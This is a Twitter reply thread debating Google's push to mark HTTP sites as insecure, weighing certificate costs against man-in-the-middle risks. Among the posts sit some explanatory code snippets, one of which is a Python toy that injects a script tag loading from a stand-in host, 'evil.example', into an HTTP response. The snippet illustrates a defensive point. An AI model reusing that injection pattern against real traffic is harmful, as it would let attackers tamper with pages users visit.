
I don’t agree with all the points ⁦@davewiner⁩ makes here, but his underlying premise is key: we should be very wary of the coercive power Google has over the web. Labeling an old static site that collects no data “insecure” is simply inaccurate.
Google and HTTP
I've been writing about Google's efforts to deprecate HTTP, the protocol of the web. This is a summary of all the reasons why I am opposed to them doing this.
277 replies and sub-replies as of Jun 15 2018

I’m all for HTTPS — every site or app on @glitch supports it automatically — but we’ve seen Google coerce sites into changes before, even on something as small as an underscore, and it’s bad for the web.
Underscores, Optimization & Arms Races – Humane Tech – Medium
A history of how we started designing apps & content to appease algorithms instead of ourselves, and the arms race that ensued.
(For the record, I’m 100% in favor of HTTPS and strongly encourage sites to move to it. I also don’t think Google should be in a position of unilaterally foisting costs on independent sites.)
Something that I keep wondering about is "what is the environmental cost of HTTPS everywhere?"
'Costs'? What costs? Let's Encrypt is free. For lower-volume sites, Cloudflare's free tier takes a few minutes to set up and get running.
These things don’t actually work for everyone, and getting the knowledge to set them up requires thousands of dollars of education & free time. I wasn’t able to do it on the server that hosted my site & ended up just moving my blog to Glitch.
Fair enough; my opinion is skewed by long web experience. But putting your users at risk because you lack the skills to keep them secure is also less than ideal!
Sure, but that’s what the web is *about*. Being able to participate even if you lack experience. And it’s especially important to preserve sites from before the dominance of Google & Facebook.
The notion of free TLS is so new that it may still seem like "requiring" HTTPS is a barrier too high for many to surmount. But I believe we have the tools now (LE, Caddy, etc.), and once they become established, enabling HTTPS will be automatic, with no experience required.
Completely agree. This move is costing us around $150k to implement. For a small business with 7-ish people, it’s a big deal.
Hi Ben. Not doubting your figure at all, but would you be willing to break that cost down? I would love to know more about the costs that other companies are facing to encrypt.
I agree with the general point re: coercion by Google (or whomever) but this “HTTP is insecure” movement specifically has broader support than just Google, right? Mozilla is arguably the most ethical of the browser makers, and they’re doing the same thing:
Communicating the Dangers of Non-Secure HTTP
HTTPS, the secure variant of the HTTP protocol, has long been a staple of the modern Web. It creates secure connections by providing authentication and ...
I think their change, focused on passwords, is a perfect balance. And Mozilla’s responsibility is very different since they don’t have a search monopoly and monetization dominance.
At the end they mention plans to indicate every HTTP page is insecure (although could have changed since published a year and a half ago). But regardless of motivation, isn’t the end result the same? Unless Google plans on using it as a negative signal in search or something?
They do plan to use it as a negative search signal.
Oh. WELP ¯\_(ツ)_/¯ I agree with regard to that, then. A browser is supposed to be my “user agent”; a search engine is supposed to show me relevant things.
Interesting... I always wondered what happened to Anil Underscore...
Every new requirement or even “best practice” adds a barrier to just making a web page without using some increasingly entrenched middleware. I don’t think a static blog that doesn’t use JavaScript or cross domain resources should be held to the same standards as an email client.
Quite true. And there are decent alternatives. Maybe the UI should show "Insecure forms" if, say, the site uses forms and doesn't have SSL. Explicit, and clearer than the status-quo. If no information travels up, there's no reason to call the site insecure.
I'm not sure I agree. Data is flowing two ways; without HTTPS, who's to say that the old static site you want to visit is the actual page you end up going to?
If we’re gonna go there, how do we know the server hasn’t been rooted?
We don't, but if we had an easy-to-use, widely deployed technology that could defend against that possibility, it would also be worth implementing even on static sites that don't collect data.
Like you and Dave, I'm wary of Google pushing its weight around, but I don't think making that argument requires denigrating the usefulness of HTTPS, nor the desirability of ubiquitous encryption
Never mind that HTTP/2, Brotli and more 'new web' techs require it. Insecure is rapidly becoming the second-class internet.
If I denigrated the usefulness of HTTPS, let me know where, and I'll edit the piece. That certainly is not my belief or intention.
Chances of that are far smaller than a MITM; at some point you have to trust the server. Some random coffee shop using a provider which inserts cryptomining / malicious code is far more likely (and happens widely).
What % of servers are running an insecure version of their content management system?
It's far from either / or. That just smacks of whataboutism. The point is that it doesn't matter if you're running v.latest of some CMS with a super locked down server; if you don't use mechanisms like HTTPS & HSTS / pinning you're potentially exposing your users to risk.
Every site we visit is potentially putting us at risk. Using one factor to decide to display secure/insecure is a poor threat model.
I agree but back to your original point; ALL sites should have HTTPS enabled by default and redirect to a secure version when necessary. Cost is no longer an excuse...
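The "redirect to a secure version" setup mentioned above can be sketched as a web server config fragment; this is a minimal, hypothetical nginx example (the domain name is made up), not a complete hardening guide:

```nginx
# Hypothetical server block: answer all plain-HTTP requests with a
# permanent redirect to the HTTPS version of the same URL.
server {
    listen 80;
    listen [::]:80;
    server_name example.com;
    return 301 https://$host$request_uri;
}
```

A separate `listen 443 ssl` server block would then serve the actual site with its certificate.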
You gonna pay to move my old sites?
So if your site is found to be hosting malware tomorrow you blame people not helping you to move to a more secure app? If you deliver content to users *you have a responsibility* to keep them safe.
There’s no malware today, there was none yesterday. That’s the point — on a static site, nothing has changed except one of the richest companies in the world giving a site owner a unilateral deadline to make a costly change which users don’t (yet) care about. What’s next?
Anyway thanks for the debate. Have a great day!
Very well put! ;-)
There is a benefit to not allowing ISPs and govt agencies seeing what you are reading, and a great benefit to having as much traffic as possible be encrypted, but for static sites without web forms the upside is minimal at best.
It's worth keeping in mind that HTTPS isn't about the site, it's about the connection between user agents and the site. If your site runs your visitors' computers hot because someone injected a coin miner, the visitors won't care if the script came from your server or not.
Your ISP or hotspot can inject javascript in non-HTTPS pages and it's completely non-transparent. That in itself justifies retiring HTTP.…
Google and Mozilla have taken over two years to let users know this labeling change for HTTPS was coming in their browsers. How many years did you expect them to wait to nudge users away from an insecure protocol?
HTTPS does not provide any proof of authenticity or identity. Zero. It simply encrypts traffic on the wire. Anyone can get a free LetsEncrypt cert and attach to a stolen domain.
Indeed, HTTPS-everywhere won't square Zooko's Triangle. Corporate oligarchies dictating those trade-offs will have predictable results.
US and CN governments like to MITM plaintext sites to pwn the browser
I agree with all of those arguments. None of them refutes this key point about Google’s coercion, or explains who’ll pay the countless millions of dollars to retrofit older sites.
I wasn't looking to refute a thing, just sharing the link :)
HTTPS is about guaranteeing the content you see comes from the correct server
I know what HTTPS is, and do think every site should adopt it. Do you know the history of Google forcing costs on independent sites?
Yes, I do. Every browser vendor imposes costs on developers in one way or the other. :(
I agree on the Google point, but I don’t see how opposing HTTP deprecation meaningfully addresses that problem. This feels like the webmaster equivalent of Rolling Coal.
Is that entirely true, though? It _is_ exposing me, to my ISP and anyone else who wants to look along the way.
I think that’s a valid concern. I don’t think Google should threaten an economic cost with a unilateral deadline to force people to fix it.
Your ISP can still see what domains you access *despite* HTTPS... I do think a tracker-free static HTTP site is a far smaller privacy risk than an HTTPS site with any kind of ads or analytics.
If you use their DNS, yes, but how else?
Which poses the next question: who do you trust with that data instead of your ISP?
Can't plain HTTP traffic be trivially modified while the same is not true for HTTPS?
Absolutely. Moreover, the price argument is so relative when one considers the degree to which many web hosts overcharge and the difficulty someone with an old website or blog will have in adding a new SSL cert.
Hi Christina! Fortunately, Let's Encrypt can do away with all of that cost and difficulty. For instance, all of my domains through my host just got certificates issued to them last month, no cost. All I had to do was ask my host to do it!
Let’s Encrypt is awesome and it’s great your host is using them. My concern is many do not and setting it up yourself, while trivial for many of us, can be complicated when you consider it needs to be renewed every 90 days
Again, I love LE and am so glad it exists. My broader point is that for many sites, especially older static sites, the hosts they are on likely don’t care or won’t implement LE for free.
Same here: LE's a game-changer. I've implemented it a few times myself, and installed certbot alongside to keep the certs renewed. I am hopeful that most HTTP-only sites will be upgraded. For the rest, they will still be served to visitors, just with a small warning in the UI.
I have moved sites to HTTPS with @letsencrypt. Before people say this is too hard they should try it on a site themselves. I was surprised at how easy it was.
If the publisher of an old site is paying for hosting, that host is going to support free HTTPS certificates from @letsencrypt if it doesn't already. The Google/Mozilla push to HTTPS has made doing this easy and free in most circumstances.
It’s the browser’s job to keep the user safe. I don’t see how a change in google ranking is unfair now that certs are free.
A browser is a User-Agent. Its responsibility is to the USER not the server. If a site is non-https the session can be monitored and modified by ISP, work vpn, or a hacked Wi-Fi that doesn’t care if you’re serving recipes, it’s inserting a bi*coin and FB password miner.
Installing & configuring certs isn’t free. And free certs don’t work for everything.
Agreed but neither is hosting a website. In what situations does letsencrypt not work? There’s github pages but I do wish there were more good, free (of cost and ads) website hosting solutions. Mostly I wish self-hosting from a broadband-connected home was easy for all.
Well, I am the CEO of a company providing good, free, ad-free, no-tracking, HTTPS dynamic or static websites, so I think I'm pretty solid in being in favor of that, too. But the broader issue is Google's coercive power. We need to not just accede to them, in general.
Curious: what don't free certs work for?
Apparently if you want to submit a podcast RSS feed to iTunes you can't use a Let's Encrypt cert.
Idk but are you sure that’s a current limitation? Looks like that was a problem in 2016 before Apple updated their root CAs. If anyone is rejecting letsencrypt certs now that is a problem.
Apple Silently Adds Support for Let's Encrypt Certificates on Podcast Feeds - FeedPress
FeedPress has tested compatibility and is happy to confirm that you can now submit podcast feeds to iTunes using Let's Encrypt SSL certificates.
It's not free the first time, but after that the script handles it unless you're purposefully making it hard.
Keeping code running is harder than keeping static files up. Letsencrypt makes this fairly simple, but it still needs you to update your site or your dns in response to a challenge, so you have code that can post to your site.
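The challenge-and-renew flow described above can be sketched with certbot; these are deployment commands to run on the server hosting the site, and the domain and webroot path here are hypothetical:

```shell
# Obtain a certificate by answering the HTTP-01 challenge: certbot
# writes a token under the webroot, and Let's Encrypt fetches it
# to verify you control the domain.
certbot certonly --webroot -w /var/www/example -d example.com

# Certificates expire after 90 days, so renewal must be automated;
# this re-runs the challenge for any cert nearing expiry.
certbot renew --quiet
```

Scheduling `certbot renew --quiet` from cron or a systemd timer is what makes the 90-day lifetime hands-off; without that automation, the renewal burden the thread describes is real.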
If your site is really that unimportant, then nobody will notice that Chrome says it's not secure.
That's quite the non sequitur. You're handwaving away the admin tax. But even big 'important' sites die.
I maintain nearly a thousand non-free SSL certs for a Fortune 500. I'm intimately familiar with how much work it is. If your site is important enough that anybody will notice Chrome says it's not secure, you can afford to manage a free cert.
Some hosts, @HeartInternet for instance, with millions of HTTP sites, charge for certs and don't enable the use of Let's Encrypt on shared boxes. So even discounting the time factor, HTTPS isn't free universally.
Given it can be intercepted by any man in the middle to do any harm they want, it's insecure. How can you prove that your site reaches your client the way you made it? With HTTP, you just can't.
I understand how HTTPS works.
So you know why it's insecure not to have it 🤷
Do you think it's insecure for people to have to change things as minor as punctuation marks on their websites in order to appease Google? I think that's also a vulnerability of the web.
You're whatabouting now. Anyone can inject some hidden JS into your page to spy on that user in many ways, or mine coins, or whatever, if it's HTTP. That's the very point of flagging it as insecure.
(And about your whatabouting point: I don't use any Google products myself, for a reason 😉 but that doesn't change that HTTP is exploitable by any MITM.)
It's one point. Another point is Google cementing their ability to make every site on the web pay to change their infrastructure, or face economic penalties from Google. You keep ignoring that point. It's not whatabout, it's the fundamental.
HTTP is not in any way secure. THAT is fundamental. HTTPS is free nowadays, so it's absolutely no issue for anyone.
It's absolutely no issue? How come you haven't upgraded every HTTP site then?
I did all mine. And yes, it's no effing issue. It's not some evil plan of Google to make certificate money or anything 🤷🤦 Let's Encrypt and Cloudflare both provide free options for certificates for any page.
I'm asking why you haven't upgraded every HTTP site. You said it's nothing. So upgrade every site. Can I tell everyone you'll do them all for free?
Because I don't own them? Thus I can't access them to fix? How fucking stupid, seriously?
I guess you never install any updates on any systems either, 'cause that is eeevil.
Ah, I see, you’re not ready to talk with the grownups.
Says the guy who thinks HTTPS costs money to install and is somehow an evil plot by Google.
If it costs nothing, why haven’t you updated every HTTP site? Can I tell everyone you’ll upgrade them for free?
Because I do mine, you do yours, etc. Same for patching. How the fuck is that hard to grasp? And yes, I paid $0 to do mine, as does everybody else.
Just because the certificate can be gotten for free doesn't make the whole process of switching sites and services over to using it free. Some things might require new planning, custom in-house code might need refactoring, and you'll wanna check what ciphers and protocols you enable.
He obviously knows that and is incapable of acting like an adult about it. Although I suppose it’s more charitable to think perhaps he’s just incompetent?
No. But it's a website owner's duty to patch, update, and secure their systems. You can choose not to, but then you get flagged as insecure. If you don't value making sure your visitors are safe accessing your content, you deserve that.
*checks list of .gov sites that don't support HTTPS* I want a refund on my tax money that went into those sites. Who do I send notice to, Dave?
Contact the owners of the site, obviously. Your government, then.
Many folks with a website probably have no place operating it themselves, granted. But lots of smaller companies still need that website to either relay non-interactive content or simply to get discovered online (particularly by searches). Simple for you/me != simple for everyone.
For whoever made the site, it IS simple. If it's some hoster, contact them. If it's self-made, ask the guy who set it up. Etc. Create a Cloudflare account. Point DNS to it. Point Cloudflare to the site IP. Done.
These are all things which require technical knowledge and time spent. Some of the static sites still using HTTP are run by people with neither the time, the know-how, nor the budget to get help. There are more websites than people, and not every webmaster is on the same level.
So having them exploitable in the open has to be OK 'cause they DGAF? Seriously, guys, you're fucking bonkers.
It's like a 5-minute task for any static website with Cloudflare if you want the easy route. If you can't be bothered with that, don't do websites. It's your responsibility to your clients.
You nicer than me💞
Feels like preserving old sites and putting up new sites are two fundamentally separate concerns
Old sites that are no longer being updated, that is
Yes. And very different from a resource point of view. If I've created 1000 sites since 1994, the cost of converting them is huge, especially considering that most are already somewhat broken. It means opening environments that might not run any more, given the OS vendors' deprecations.
That is to say, it is easier to make the case that HTTP is insecure than it is to make the case that HTTPS is secure, because what is "secure?"
I think the criticisms from the other folks (particularly the SEO & firewall nonsense) are fine. I understand this isn't a Google-only initiative, but other players don't have coercive economic power over independent sites, which is the underpinning of the concern here.
(reiterating: ) — every @glitch site or app is HTTPS, and has been from the day we launched, for free.
(For the record, I’m 100% in favor of HTTPS and strongly encourage sites to move to it. I also don’t think Google should be in a position of unilaterally foisting costs on independent sites.)
^ This is how you HTTPS.
I am always skeptical of Google, but when they are right on a point, I will acknowledge that. I do not see how this UI change asserts any power over... anyone. Google is not forcing anyone to buy a certificate, especially from them. HTTP will continue to work. Am I wrong?
HTTP content will be ranked below HTTPS content, even if the HTTP content has not changed in accuracy or relevance. This is foisting an economic cost on people who've created content, and conflating Google's search/advertising dominance with browser/protocol security.
I would consider this separate from the upcoming UI change, but it is a very good point, one that I cannot immediately counter.
I think it's the key (and admittedly a tough one to articulate) and we need to find a way for the community to discuss it, because sometimes it *won't* be in service of things like HTTPS that we all agree are worthwhile.
Google isn't even a CA, so it wouldn't make any sense if they were profiting from certificates. HTTP is going away, but it will still work, just with a 'not secure' warning. Flipping the indicator makes sense: more people see 'Secure' most of the time now, and it's eroded any value it once had.
As HTTP quickly becomes the minority and secure becomes the default, I'd agree that it makes total sense for the default state to not attract any warnings/indicators to avoid fatigue.
They don't and that's why if it was Google acting alone we should all be concerned. The reality is though that countless, independent organisations and people the world over agree that a secure web is better for everyone. That's why we're moving towards achieving that goal.
Google is acting alone on connecting this initiative to its economic power through search & advertising. If they want to use their economic power to encourage HTTPS, they should write checks to publishers to move them over.
As we all acknowledge, this is not a Google-only change, but they are catching all of the flak. So what are they to do? Sit on their UI change while every other browser maker implements theirs?
If they made the UI change and didn't tie it to their search & advertising dominance, I think the conversation would be very different for me.
Correct me if I'm wrong, but didn't Google start preferring HTTPS sites in their search results four years ago? I don't see how they're tying this UI change to their established search engine bias. I suppose if that was their plan, an industry-wide shift would provide cover...
I don't make an issue of the search engine. It's theirs, they created it. I may not like that they have devalued my (in some cases authoritative) writing on topics because it doesn't come via HTTPS, but I admit they have the right to do that.
They do, but I’m thinking more of sites that also run Google ads. Tying economic & security concerns muddies both.
Perhaps, but that shouldn't preclude a good change from being implemented, especially when not doing so would make them look less security-minded than their competition.
By the way, I apologize if my responses look disconnected from the conversation. I'm seeing fewer comments than the counter indicates, so Dave (who blocked me a while back) must be commenting as well.
No worries, I’m following along.
Not that I think it's wise. There's a name for it, "strategy tax." Microsoft used to do that. And imho it didn't work out well for them. They should be trying to make the best search engine. It shouldn't be more complicated than that.…
Google is rather bigger than just search. I suspect the advertising side is bigger than search. More to the point, standards change and evolve. Some lead and drive change, while others maintain legacy for longer. Nothing sits still.
There is nothing to stop you using RS-232 or floppies now; it just takes a bit more effort because manufacturers don't support them out of the box.
"I don't make an issue of the search engine. It's theirs, they created it." You make an issue of their browser. It's theirs, they created it. 🤔
My biggest problem with all this is the people making out that Let's Encrypt has made using HTTPS easy / free. They don't support the default OS on the most popular hosting provider (Amazon Linux). Baffling that people consider that OK while promoting them?
Luckily Amazon offer their own alternative via ACM that's easy to use, but it shouldn't be made out that LE have made https easy for *everyone*, because it's not the case.
I'm not sure anyone claims they've made it easy for *everyone*, that would be silly.
It's implied a lot though, we are told there's no excuse for not being on HTTPS now because of them - which isn't the case. I agree with the moves google are making but it's not right to claim that LE are the sole enablers for everyone, which I've seen a lot.
Installing a cert via LE is pretty easy though. If you're already running your own server I reckon you could handle it. If you're on managed hosting then you probably have an option for HTTPS from your provider.
I've done both, and I agree that when it's an option, LE is fantastic. I think Chris's point is that there are "else" cases after your "ifs", where LE is not an option. In many cases, there are alternatives to LE, but in other cases, nothing fits the role.
It is on anything but Amazon Linux. I managed it once, after a lot of faff, but at renewal it totally broke. Can't be relied upon, and they don't officially support the OS. I use ACM now and it works fine though.
Serious question: Why use Amazon Linux over Ubuntu? I've always used an Ubuntu AMI for EC2 setup and it's generally plain sailing. What does Amazon Linux offer to make it worth using?
I've always preferred Red Hat/CentOS-based OSes to Debian/Ubuntu anyway, am more used to them, and Amazon's yum repos are kept much more up to date than CentOS's, so it's the best of both worlds too.
Looking at pricing for Ireland, Amazon Linux is less than half the cost of RHEL on the same instance type. Significant savings.
I'm not running RHEL though, I'm running Ubuntu. Pretty sure it's the same cost as Amazon Linux.
The other reasons apply then. Always saw Ubuntu as more of a desktop OS. I'm sure they used to be priced differently too!
That's fair to say. I suppose that this early in the paradigm shift where HTTPS is the default, statements like "LE is free and easy!" should be preceded with caveats. In many cases, yes, LE (and similar services!) make HTTPS free (of some specific costs) and (relatively) easy.
The open web with conforming user agents is different than a proprietary commercial search engine.
Sadly, labeling them as insecure is too often accurate. But - the people claiming Dave has no point and HTTPS is free and w/o downsides are wrong and obnoxious. A proper plan to improve the security of the web would recognize and address his concerns, not brush them off & mock.
An old HTTP site is insecure because it can be modified in transit with no indication to users that it occurred. This is happening all over the world. Verizon injects an X-UIDH header as a user-tracking "supercookie" into all customer HTTP traffic, for instance.
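The kind of in-transit tampering described above (supercookie headers, injected scripts) can be illustrated with a small Python sketch. The header value and script URL here are made up, and a real middlebox rewrites live traffic rather than a byte string; this just shows why plaintext responses offer no integrity:

```python
# Toy model of an on-path box (ISP, hotspot, proxy) rewriting the bytes
# of a plaintext HTTP response before they reach the browser. Nothing in
# HTTP itself lets the user agent detect that this happened.

def inject_into_http_response(raw_response: bytes) -> bytes:
    """Simulate a middlebox adding a tracking header and a script tag."""
    head, _, body = raw_response.partition(b"\r\n\r\n")
    # Append a tracking header (modeled on the X-UIDH "supercookie").
    head += b"\r\nX-UIDH: example-supercookie"
    # Splice a third-party script into the HTML body.
    # (A real injector would also fix up Content-Length; omitted here.)
    body = body.replace(
        b"</body>",
        b"<script src='//evil.example/m.js'></script></body>",
    )
    return head + b"\r\n\r\n" + body

original = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    b"<html><body>Hello</body></html>"
)
tampered = inject_into_http_response(original)
```

Over HTTPS the same rewrite would break the TLS record authentication, so the connection would fail rather than silently deliver modified content.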
Stop beating around the bush and strike directly at Capitalism.
Yeah, and also securing IP in general would be a better project for Google to push. Securing each protocol independently is (a) much more work, (b) a larger attack surface, (c) leaves unpopular protocols behind, etc.
I believe the connection, not the site, is what’s labeled insecure. Not that most users appreciate that difference and it doesn’t diminish Dave’s valid concerns.
Trying to find where I stand on this. Moving all sites to TLS is a mutually agreeable goal. The cost of that move, while cheap now thanks to LE, is still >$0. Is the only issue here that Google is the one coercing the spend? If it were some independent body, would that be fine?
'HTTP is great because anyone and everyone can ship it' - is this actually great? Aren't we being forced to reckon with the legacy of imperfect web techs that have given us IOT botnets and easy-to-fuck-up apps that leak data or can be used to pivot against others?
I think the web's "social agreement not to break things" is beautiful, but did it ever really work? Yes if you look at adoption as a metric but once you include security, every unpatched CMS is a transgression against that agreement.
Agreed! I used to have a lot of success selling against insecure CMSes. :)
Well, it’s complicated. There was a similar argument to this about SMTP; some people chose to run principled open relays based on the belief that tools like SPF hurt anonymity, etc. Some still believe human-readability of protocols is a value worth preserving.
I think it’d be closer to fine. Certainly would be cleaner and less fraught.
Agreed. But I differ on immediate concern. It's good to be wary of Google's influence. But also the pace of change in these tech stacks has been so slow. I think I want that needle shifted closer to security, though that comes at some expense to compatibility.
So I'm happy Google is doing something, because there's currently no alternative authority that can force the change. Which, admittedly, is a bit of a cop out if your concern is ensuring checks and balances on Google...
Yep, and I think Google uses the broadly-loved initiatives like HTTPS as the thin end of the wedge for less clear-cut goals.
It's by design that they don't change. That's the great thing about the web and why it's a good place to archive stuff for future historians. If Google wants to make something better, they are free to. But they should not interfere with the web.
The history concern is an interesting one, but it can be mitigated in part by archiving projects. I'm not convinced that what remains is a good enough reason to delay a positive step for security on the web.
And I really strongly disagree with your central simplicity point. I don't believe there's a big shortage of TLS capable hosts, and if you tinkered enough to put your own box online then you can tinker a bit more and have it speak TLS.
Not to do so is irresponsible, in the same way that standing up a box with no patches and root:root SSH creds is irresponsible (though granted to a lesser degree).
The fallacy here is that the old static site that collects no data will continue to be a static site that collects no data, once its content is entirely under the control of a third party the original author didn't opt into.
Sure, and the fallacy is also that an HTTPS site running ads from a network like Google’s, known to redirect users to hostile sites, isn’t marked as insecure. Both matter. The latter affects more real users.
I don't know if you have data for that claim, but I've frequently seen http sites infected by WiFi hotspots. I'm also unaware of these hostile redirects, but they're surely bugs, right?
Additionally, Dave is a trash source. He posted that Chrome on Mac had officially been abandoned, citing an unnamed internal source. Then he proceeded to delete comments from Chrome folks refuting that. He has a massive agenda here for some reason.
For completeness: Here's the post where Dave said Chrome had officially been abandoned. He's since removed that from the post (much later), but some of the comments still hint towards the original content.…
And he throws his toys out of the pram about me here…, because I dared to call him out on deliberate misinformation.
I've been flamed by Dave many times, some of them clearly in the wrong. I'm not vouching for all he says, I'm using his points to illustrate a larger issue.
Then find a better source. It's like giving the thumbs up to Fox News at this point.
Okay I’ll try to write something up.
FWIW Anil, I recommend you not write this up, at least as you've expressed it on Twitter, because it's not accurate. Google isn't unilaterally doing anything. Mozilla, the USG, and many other orgs are making the same push.
The only point I'll give to Dave is that site owners are being asked to take on some complexity, but when it comes down to it, Mozilla and Google both ultimately put user needs above site owner needs -- and that's what we should want.
It's also important to understand that labeling an old static site as "insecure" is completely accurate, if it's served insecurely. I won't go on a long tweet thread with the reasons unless you want me to, but content integrity and herd immunity are crucial to a healthy web.
I think that's a strong argument. I think it's important to understand the implications of Google's ability to unilaterally exact costs from creators, too.
None of them are using the coercive economic power of monopoly advertising, search or search targeting systems. Which is central to my point.
Google's ability to abuse its vast power across many verticals is real. But I don't think HTTPS is a good example of this, since they're part of a coalition with so many differing incentives and conflicts and levers. It's better seen as a team effort with an obvious large player.
I can see that.
I second Eric here, but if you write something, I'd like to read it. Nice chatting with you yesterday, by the way.
Absolutely agree with Eric here. He may be too humble to point to it, so here's the more direct, systematic response. There are many of us doing whatever we can to get everyone on HTTPS, by default, using modern crypto.
The HTTPS-Only Standard - Why HTTPS for Everything?
Resources, best practices, and case studies for deploying HTTPS in the federal government.
Co-signed (with my Mozilla hat on) that this is a multilateral effort and is the foundation for safety and security of people using the web, including static sites. We don’t know each other, Anil— but happy to have a chat about this anytime!
To be clear — I fully support the HTTPS push, and get it, and that's why (e.g.) Glitch has always done HTTPS for everything from the start. The broader conversation was more about how Google uses its economic power; this was probably not an ideal example to hang that on. :)
To be fair, he does have a slight point with the advertising redirecting us to insecure places, I've seen that a lot. The Google marking insecure websites thing is wrong though, users can make their own decisions based on that, also it isn't only Google doing it.
Sure, but if "a site was redirectable to another origin by a third party" earned a "not secure" label, we'd have to mark loads of the web that way (eg ). That would lead to warning fatigue – exactly why we held off on marking HTTP as "not secure" by default.
… – redirects, except in Chrome where we block it. These kinds of iframes are on the homepage.
!/redire… – click "Show", and the original page is redirected. So yeah, by these rules we'd have to mark Glitch as "not secure".
Combining automated deployment, instant hosting & collaborative editing, Glitch gets you straight to coding so you can build full-stack web apps, fast
I agree with what you're saying, it's a never ending subject really. I think we should mark http websites as insecure, as long as we just do that and let the user decide if they want to continue. In terms of cross site, that's another question that also needs to be looked at.
I think cors works for a lot of things but it isn't perfect in my opinion. I don't really know what the solution is to these, it probably isn't a not secure message though tbh, it will take smarter things than that.
Yeah I'd agree, cors isn't what it could be as there's no real client side validation. SRI works great for development, the average WordPress user doesn't understand it though. Something as secure and as simple as https is definitely needed for cross origin IMO.
CORS is for "should origin A be able to read the content of origin B", it isn't supposed to make claims about the content. SRI makes claims about the content. HTTPS makes claims about the sender and the transport.
Sure, I get that, just saying it would be great to have CORS and SRI and HTTPS in one easy-to-understand package for the average user.
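The CORS/SRI/HTTPS distinction above is easiest to see in SRI's case: the page author pins the expected content by hash. A minimal sketch of computing the value browsers expect in the `integrity` attribute (the script content here is just a placeholder):

```python
# Sketch: computing a Subresource Integrity (SRI) value.
# The format is "<algo>-<base64 of the raw digest>", e.g. "sha384-...".
import base64
import hashlib


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return an SRI string for the given resource bytes."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


# The result goes into markup such as:
#   <script src="lib.js" integrity="sha384-..." crossorigin="anonymous">
print(sri_hash(b'console.log("hello");'))
```

If the fetched bytes don't match the pinned hash, the browser refuses to run the resource, which is exactly the "claims about the content" role described above.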
Google has a lot of power over the web, but HTTP is legitimately insecure. Regardless of what Google wants from you, you've viewed insecure content that may have been tampered with in many trivially easy ways, especially on "public WiFi". The label is quite accurate IMO
All browsers do this; Chrome just makes it more explicit by using words in addition to icons.
We also have no intention to make people click through warnings to get to HTTP websites. Most of that blog post is a conspiracy theory. We have made our plans known for years before making the corresponding UI changes, and full page warnings are not on the roadmap.
that post makes it sound like google will be breaking the web. Whether you have an iPhone X or a rotary phone you can still make calls, and the same can be said about http vs https
aren't rotary phones incapable of working with modern telephony networks?
Dave Winer has conspiracy theories? Wow, color me shocked!!
Something something Gwyneth Paltrow
Once, in a particularly deep Chrome debugging session, I stumbled across the code that killed JFK. Aaaa!... they're coming for me!
This isn’t just about the browser, though (for me). There’s a broader point about how Google uses its economic influence over independent sites to force then into costs they can’t predict, while not holding itself similarly accountable.
There are plenty of things Google does that merit criticism, in particular on web privacy (Chrome could do a lot more), but on this I feel Google is using its power for good and responsibly. This is the kind of thing we often ask big companies to do: use your power for good.
Plus, this is entirely a user agent change. You could pick a different browser... Although others have concluded that this path makes sense, too, and I don't think it was under duress.
I agree with the goal of this one, but not the tactic. Does that make sense?
Which parts of the tactic? I think Dave Winer is overstating the tactic significantly.
2 qs: Would you put this in the same category as a certain fruit company removing the headphone jack? Can there be a meaningful heuristic to recognize sites that collect data and sites that don’t?
Ignoring the motives of Google, encrypting every part of the web is a necessary step in evolving the platform and ensuring the free exchange of information over the internet. In my opinion.
What if google decided a necessary evolution of the housing market required no two-story homes. It’s safer, no stairs to fall down on and hurt yourself.
Many countries do have building safety regulations for even private residences - i.e. compulsory sprinkler systems, regulated non-flammable materials, etc. Your reductio aint *that* absurdum, really.
Those are government regulations and theoretically the governed have a say and a method of appeal. None of which is true here.
No, but neither do Google regulate house size
A more accurate comparison would be if a gated community imposed those rules on their owners.
I disagree with both you and winer. All HTTP sites are insecure because they may be changed in transit. It may have been a static site when it left the server but it could be anything at all by the time it is received. It could be one big iframe.
However, I see a different critical problem with what Chrome is doing, in line with Winer's complaint. HTTPS is not forward compatible. Downgrade attacks mean we have to deprecate TLS versions periodically.
A TLS web server from today will not be able to talk to a browser from 20 years from now. A browser from today will not be able to talk to a TLS web server 20 years from now. That is an existential threat to the web, or changes it into something else at least
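The deprecation mechanism described above is visible in today's TLS stacks: clients and servers can (and increasingly do) refuse old protocol versions outright. A minimal sketch using Python's `ssl` module:

```python
# Sketch: modern TLS stacks let you set a floor on protocol versions.
# A peer that only speaks an older version simply cannot connect -
# which is the forward-compatibility concern raised above.
import ssl

ctx = ssl.create_default_context()
ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # refuse TLS 1.1 and older
print(ctx.minimum_version)
```

Each time a version is retired this way, software frozen at the old version loses the ability to talk to the live web, in a way that never happened with plain HTTP.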
Old static sites that collect no data (themselves) are still insecure. This is just one case where it happened, but many ISPs around the world regularly inject ads into all HTTP traffic
How a banner ad for H&R Block appeared on—without Apple’s OK
Someone, somewhere is injecting banner ads into webpages on the sly.
No argument. But brand new, HTTPS sites that run Google ads are also susceptible to being redirected to hostile sites. And it seems like that's affected the same number of users. So, what are the criteria for consideration?
The premise of HTTPS is that the origin is in control of security. The legacy “secure” was definitely wrong. The new states are “definitely insecure” and “undefined” which makes sense to me.
C'mon, it's the same answer I gave you earlier. That was a bug as part of Google's service. Glitch currently has similar bugs. As do many sites. The reason we held off on marking HTTP as "not secure" is to avoid error fatigue.
And again, this is moving the goalposts. You're saying "plain HTTP is not secure" is "inaccurate", how are you justifying that?
Maybe better stated as “how Google defines ‘secure’ isn’t knowable or accountable”.
And re: redirecting ads, this isn’t people creating harmful content, which can happen on any open platform. It’s harmful content being injected into other sites, which causes Google to flag sites as insecure when others do it. This goes back to the lack of definition.
I think the conflation of the value critiques with the absurd ones, and the fact multiple googlers have alluded to conspiracy theories here, is a bad look.
I think your critique is completely fine. You just conflated it with a conspiracy theory which is a bad look. Just disentangle it and you're fine.
Agreed. There might be good point here that's being lost amongst the whataboutery and "Dave Winer said…". From my end it looks like "Google ads delivered some bad content in the past, therefore all browsers should mark plain HTTP as secure"
Okay, try this: Google has coerced independent sites to keep chasing poorly-defined requirements for more than a decade, at times conflating legitimate concerns like security with conveniences like appeasing its ranking, while leveraging monopolistic economic power over them.
Given that power imbalance, a clearly-stated rubric stating when Google will exert economic influence over sites is necessary, and until it is, mandates of conformance with new requirements should be accompanied by funding from Google's ad & search platforms to accomplish them.
